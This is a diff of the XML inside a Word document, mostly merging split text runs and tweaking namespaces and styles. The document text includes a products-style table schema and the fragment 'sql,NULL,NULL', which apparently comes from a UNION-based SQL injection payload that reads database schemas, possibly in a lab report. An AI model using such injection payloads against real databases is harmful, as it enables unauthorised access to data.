-        </w:rPr>
-        <w:t>sql,NULL,NULL</w:t>
+        <w:t>,NULL</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -3319,19 +3563,11 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER PRI</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id INTEGER PRI</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3349,19 +3585,11 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TEXT NOT NULL,</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>name TEXT NOT NULL,</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3373,19 +3601,11 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>price</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TEXT NOT NULL</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>price TEXT NOT NULL</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3570,7 +3790,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="17F36DAE"/>
     <w:multiLevelType w:val="multilevel"/>
@@ -4715,6 +4935,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
